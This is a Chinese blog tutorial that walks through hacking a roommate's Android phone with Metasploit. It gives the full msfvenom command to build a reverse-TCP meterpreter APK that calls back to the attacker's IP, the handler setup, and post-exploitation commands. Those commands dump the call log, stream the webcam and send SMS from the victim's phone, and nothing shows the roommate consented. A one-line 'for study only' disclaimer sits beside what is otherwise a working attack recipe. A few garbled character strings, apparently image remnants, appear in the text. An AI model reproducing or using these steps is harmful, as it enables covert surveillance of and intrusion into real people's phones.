实战Metasploit之安卓渗透舍友

文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用

安卓手机在移动端占有很高的比重,今天就带领大家一块利用Metasploit进行一次渗透之旅,安卓渗透和windows其实差不多的,好啦,不废话了,正题开始。

环境:kali linux 2016.02和安卓手机一部

准备工作:当然是查看自己的ip~

正式开始:

首先,生成一个反弹木马:在终端输入

 msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.104 lport=44444 r>/root/123.apk

-p  Payload to use

Lhost  攻击者的ip,就是自己的ip

Lport  攻击者的端口,(有高端口可能不是很容易被杀的一说,本人没证实)

r>/root/123.apk 文件生成的路径及文件名

然后就是搭建自己的客户端。

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

可以用指令 show options 查看我们所需要写的参数

这里我们可以看到,只需要更改lhost lport的参数。

实战Metasploit之安卓渗透舍友_第1张图片

set lhost 192.168.0.104

set lport 4444

执行Exploit指令

手机连接成功……接下来~~

首先看看手机是否经过root    check_root

N459]S][2`N[{T1@`OSURRJ

结果发现这部机子root

dump_calllog    通话记录

(这是我看到的信息)

 实战Metasploit之安卓渗透舍友_第2张图片

webcam_stream   调用摄相头

 实战Metasploit之安卓渗透舍友_第3张图片

最后顺便黑一下舍友,给他发一个消息

 H`U%MYH5YHMLMMZK@}%N$QS

Send_sms -d 电话 -t 内容

有没有很简单呢~~其实还有好多功能了,在这不一一列举了,大家自己发现吧~   

转载请注明:即刻安全 » 实战Metasploit之安卓渗透舍友

你可能感兴趣的:(技术分享)